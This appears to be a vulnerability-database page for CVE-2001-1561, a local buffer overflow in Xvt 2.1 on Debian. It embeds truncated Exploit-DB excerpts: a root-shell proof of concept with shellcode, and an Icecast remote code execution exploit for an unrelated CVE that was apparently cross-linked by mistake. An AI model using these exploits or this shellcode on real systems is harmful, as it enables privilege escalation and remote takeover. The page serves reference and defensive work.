CVE-2001-1561
published 2001-12-31CVE-2001-1561: Buffer overflow in Xvt 2.1 in Debian Linux 2.2 allows local users to execute arbitrary code via long (1) -name and (2) -T arguments.
PriorityP421high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.20%
64.4th percentile
Buffer overflow in Xvt 2.1 in Debian Linux 2.2 allows local users to execute arbitrary code via long (1) -name and (2) -T arguments.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| john_bovey | xvt | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Icecast 2.0.1 (Win32) - Remote Code Execution (1)
exploitdb·2004-10-06
CVE-2004-1561 Icecast 2.0.1 (Win32) - Remote Code Execution (1)
Icecast 2.0.1 (Win32) - Remote Code Execution (1)
---
/*
by Luigi Auriemma
Shellcode add-on by Delikon
www.Delikon.de
Because of all the forbidden bytes in a http get request
i had to use a very small shellcode, which was blown up
by Msf::Encoder::PexAlphaNum. Great encoder.
C:>iceexec 127.0.0.1
Icecast nc 127.0.0.1 9999
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Icecast2 Win32>
*/
#include
#include
#include
#ifdef WIN32
#pragma comment(lib, "ws2_32.lib")
#include
#include "winerr.h"
#define close closesocket
#else
#include
#include
#include
#include
#include
#include
#endif
#define VER "0.1"
#define PORT 8000
#define BUFFSZ2048
#define TIMEOUT 3
#define EXEC"GET / HTTP/1.0rn"
"arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn"
"arn" "arn" "a
Exploit-DB
Xvt 2.1 - Local Buffer Overflow
exploitdb·2001-07-02
CVE-2001-1561 Xvt 2.1 - Local Buffer Overflow
Xvt 2.1 - Local Buffer Overflow
---
// source: https://www.securityfocus.com/bid/2955/info
Xvt is a terminal emulator for systems using X11R6. It is often installed setuid/setgid so that it runs with the enhanced privileges required to log user sessions.
Xvt contains a buffer overflow in it's handling of the '-name' argument.
An attacker can exploit this buffer overflow to exploit arbitrary code with the enhanced privileges of Xvt. On some systems Xvt is installed setuid root. This may not be the case for all systems.
/*
/usr/bin/X11/xvt overflow proof of concept by [email protected].
tshaw:~$ ./expl
bash#
*/
#include
#include
int main()
{
char buf[234];
int i;
char code[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2001-07/0024.htmlhttp://www.debian.org/security/2001/dsa-082http://www.iss.net/security_center/static/6781.phphttp://www.securityfocus.com/bid/2955http://www.securityfocus.com/bid/2964http://archives.neohapsis.com/archives/bugtraq/2001-07/0024.htmlhttp://www.debian.org/security/2001/dsa-082http://www.iss.net/security_center/static/6781.phphttp://www.securityfocus.com/bid/2955http://www.securityfocus.com/bid/2964
2001-12-31
Published